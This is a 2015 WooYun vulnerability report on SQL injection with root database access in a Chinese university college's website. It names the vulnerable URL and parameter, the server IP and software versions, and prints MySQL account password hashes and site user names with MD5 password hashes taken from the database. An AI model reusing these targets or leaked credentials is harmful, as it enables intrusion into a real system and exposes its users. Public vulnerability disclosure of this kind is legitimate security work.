当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0104683
漏洞标题:
四川电子科技大学格拉斯哥学院SQL注入ROOT权限
相关厂商:
四川电子科技大学
漏洞作者:
龍 、
提交时间:
2015-03-31 16:57
修复时间:
2015-04-05 16:58
公开时间:
2015-04-05 16:58
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-04-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

电子科技大学格拉斯哥学院

详细说明:

Target: 		http://www.gla.uestc.edu.cn/chinese/picture_news.php?act=list&id=25
Host IP:		121.49.106.6
Web Server: 	Apache/2.2.22 (Ubuntu)
Powered-by: 	PHP/5.3.10-1ubuntu3.8
DB Server: 	MySQL >=5
Resp. Time(avg):	120 ms
Current User: 	root@localhost
Sql Version: 	5.5.32-0ubuntu0.12.04.1-log
Current DB: 	gelasige
System User: 	root@localhost
Host Name: 	bingo435-PowerEdge-T320
Installation dir: 	/usr
Compile OS: 	debian-linux-gnu
DB User & Pass: 	root:*342D0FBDE1B11362133CC3CB7116B1A21A52500D:localhost
		root:*342D0FBDE1B11362133CC3CB7116B1A21A52500D:bingo435-PowerEdge-T320
		root:*342D0FBDE1B11362133CC3CB7116B1A21A52500D:127.0.0.1
		root:*342D0FBDE1B11362133CC3CB7116B1A21A52500D:
		::localhost
		::bingo435-PowerEdge-T320
		debian-sys-maint:*FF26D9F53F064CE9717BFA10EB1A77D75E2943E6:localhost
		phpmyadmin:*839B651392244A7A50D5DEC06594218922A9087A:localhost
		glasgow:*8971B30CDBFB37510D23601ECC3D9AC96F1D6459:localhost
		root:*342D0FBDE1B11362133CC3CB7116B1A21A52500D:%
Data Bases: 	information_schema
		gelasige
		glasgow
		mysql
		performance_schema
		phpmyadmin
		test

漏洞证明:

user=Glasgow
pass=63a0d6f58db0cb26fd7ab2f8498ff035
user=ctq
pass=c8d01fd873fd5691fc500d0380dc13f2
user=wx
pass=cfcf4af6102f73e4b9589f685084cb21

修复方案:

版权声明:转载请注明来源 龍 、@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-05 16:58

厂商回复:

最新状态:

暂无